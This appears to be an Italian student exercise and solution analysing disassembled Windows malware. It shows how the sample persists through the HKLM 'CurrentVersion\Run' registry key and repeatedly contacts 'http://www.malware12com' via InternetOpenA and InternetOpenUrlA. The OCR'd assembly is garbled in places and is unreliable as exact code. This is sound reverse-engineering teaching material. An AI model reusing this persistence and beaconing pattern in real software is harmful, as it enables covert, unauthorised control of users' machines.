WINDOWS MALWARE

Con riferimento agli estratti del malware reale che seguono, rispondere alle domande:

- 1) Descrivere come il malware ottiene la persistenza, evidenziando il codice assembly dove le relative istruzioni e chiamate di funzioni vengono eseguite;
- 2) Identificare il client software utilizzato dal malware per la connessione ad Internet;
- 3) Identificare l'URL al quale il malware tenta di connettersi ed evidenziare la chiamata di funzione che permette al malware di connettersi ad un URL;

Traccia:

```
0040286F
         push
                 2
                                ; samDesired
00402871
                                 ; ulOptions
         push
00402872
         push
                 offset SubKey
                                 ; "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
                 HKEY_LOCAL_MACHINE ; hKey
00402877
         push
00402870
         call
                 esi; RegOpenKeyExW
)040287E test
               eax, eax
00402880 jnz
                 short loc 4028C5
00402882
)0402882 loc_402882:
00402882
                 ecx, [esp+424h+Data]
                               ; lpString
00402886
         push
                 ecx
00402887
                 bl. 1
         mov
                 ds:lstrlenW
00402889
         call
0040288F
         lea
                 edx, [eax+eax+2]
         push
                                 ; cbData
00402893
                 edx
                 edx, [esp+428h+hKey]
00402894
         mov
                 eax, [esp+428h+Data]
00402898
         lea
0040289C
         push
                eax
                                ; lpData
                                 ; dwType
0040289D
         push
0040289F
          push
                                 ; Reserved
                 ecx, [esp+434h+ValueName]
004028A1
         lea
         push
                                ; lpValueName
004028A8
004028A9
         push
                 edx
                                 ; hKey
                ds:RegSetValueExW
004028AA
         call
```

Traccia:

```
.text:00401150
.text:00401150
.text:00401150
              ; DWORD
                       stdcall StartAddress(LPVOID)
.text:00401150 StartAddress
                                                     ; DATA XREF: sub 401040+ECTo
                             proc near
                                     esi
.text:00401150
                              push
.text:00401151
                             push
                                     edi
                                                      dwFlags
.text:00401152
                              push
                                     B
.text:00401154
                             push
                                     0
                                                       1pszProxyBypass
.text:00401156
                                     8
                              push
                                                       1pszProxy
.text:00401158
                                                       dwAccessTupe
                             nush
.text:0040115A
                             push
                                                       "Internet Explorer 8.0"
                                     offset szAgent
.text:0040115F
                              call
                                     ds:InternetOpenA
                                     edi, ds:InternetOpenUrlA
.text:00401165
                             mov
.text:0040116B
                                     esi, eax
                              mov
.text:0040116D
                                                     ; CODE XREF: StartAddress+301j
.text:0040116D loc 40116D:
.text:0040116D
                              push
                                                       dwContext
                                     80000000h
.text:0040116F
                                                       dwFlags
                              push
.text:00401174
                             push
                                     B
                                                       dwHeadersLength
.text:00401176
                              push
                                     G
                                                       1pszHeaders
.text:00401178
                              push
                                     offset szUrl
                                                       "http://www.malware12com
.text:0040117D
                              push
                                     esi
                                                     ; hInternet
.text:0040117E
                                           InternetOpenUrlA
                              call.
                                     edi :
.text:00401180
                              jmp
                                     short loc_40116D
.text:00401180 StartAddress
                              endp
.text:00401180
tout - 881 81198
```

SOLUZIONE 1:

Traccia:

```
040286F
                                    ; samDesired
           push
00402871
           push
                                    ; ulOptions
                   eax
00402872
                   offset SubKey
                                      "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
           push
00402877
           push
                   HKEY_LOCAL_MACHINE; hKey
00402870
           call
                   esi ; RegOpenKeyExW
0040287E
           test
                   eax, eax
00402880
                   short loc_4028C5
           jnz
00402882
00402882 loc_402882:
00402882
           lea
                   ecx, [esp+424h+Data]
00402886
                                    ; lpString
           push
                   ecx
00402887
                   bl, 1
           mov
                   ds:1strlenW
00402889
           call
0040288F
           lea
                   edx, [eax+eax+2]
00402893
                                    ; cbData
          push
                   edx
00402894
                   edx, [esp+428h+hKey]
           mov
                   eax, [esp+428h+Data]
00402898
          lea
           push
0040289C
                   eax
                                    ; lpData
                                    ; dwType
0040289D
           push
0040289F
           push
                                     ; Reserved
                   ecx, [esp+434h+ValueName]
004028A1
           lea
                                    ; lpValueName
00402848
           push
                   ecx
004028A9
                   edx
                                      hKey
004028AA
                   ds: RegSetValueExW
```

1) Cerchiate in rosso ci sono le due sezioni che comprendono le istruzioni e le chiamate di funzioni che il malware utilizza per ottenere la persistenza, ovvero quella situazione in cui riesce ad essere eseguito all'avvio del PC e quindi in maniera automatica e permanente senza l'azione dell'utente.

Nello specifico il software malevolo esegue, nella chiave di registro "Software\\Microsoft\\Windows\\CurrentVersion\\Run":

- "call" della funzione "RegOpenKeyExW" per aprire la chiave, immettendo i parametri prima della chiamata tramite i "push":
- "call" della funzione "RegSetValueExW" per inserire un nuovo valore all'interno della chiave aperta, allo stesso modo passando i parametri tramite i "push" che precedono la chiamata.

SOLUZIONE 2 + 3:

Traccia:

```
.text:00401150
.text:00401150
.text:00401150 : DWORD
                       stdcall StartAddress(LPVOID)
.text:00401150 StartAddress
                                                     ; DATA XREF: sub_401040+ECTo
                             proc near
.text:00401150
                             push
.text:00401151
                             push
                                     edi
.text:00401152
                             push
                                     0
                                                      dwFlags
.text:00401154
                                     B
                                                      1pszProxyBypass
                             push
.text:00401156
                             push
                                     ß
                                                      1pszProxy
.text:00401158
                                                      dwAccessType
                             push
.text:0040115A
                                     offset szAgent
                                                      "Internet Explorer 8.0"
                             push
.text:0040115F
                                     ds:InternetOpenA
                             call
.text:00401165
                             mov
                                     edi, ds:InternetOpenUrlA
.text:0040116B
                             mov
                                     esi, eax
.text:0040116D
.text:0040116D loc 40116D:
                                                      CODE XREF: StartAddress+301j
                                     B
.text:0040116D
                             push
                                                      dwContext
.text:0040116F
                             push
                                     80000000h
                                                      dwFlags
.text:00401174
                             push
                                                      dwHeadersLength
.text:00401176
                             push
                                     0
                                                      1pszHeaders
                                                      "http://www.malware12com
.text:00401178
                                     offset szUrl
                             push
.text:0040117D
                             push
                                     esi
                                                      hInternet
.text:0040117E
                                           InternetOpenUrlA
                             call
                                     edi
.text:00401180
                                     short loc 40116D
                             imp
text:00401180 StartAddress
                             endp
.text:00401180
```

- **2)** Cerchiato in rosso possiamo notare le istruzioni inserite tramite "push" e la funzione chiamata "InternetOpenA", che si utilizza per iniziare una connessione verso internet, tramite il software client "Internet Explorer 8.0";
- **3)** Cerchiato in verde possiamo invece notare istruzioni e funzione "InternetOpenUrlA", utilizzata per la connessione ad un determinato URL, verso appunto l'URL "http://www.malware12.COM".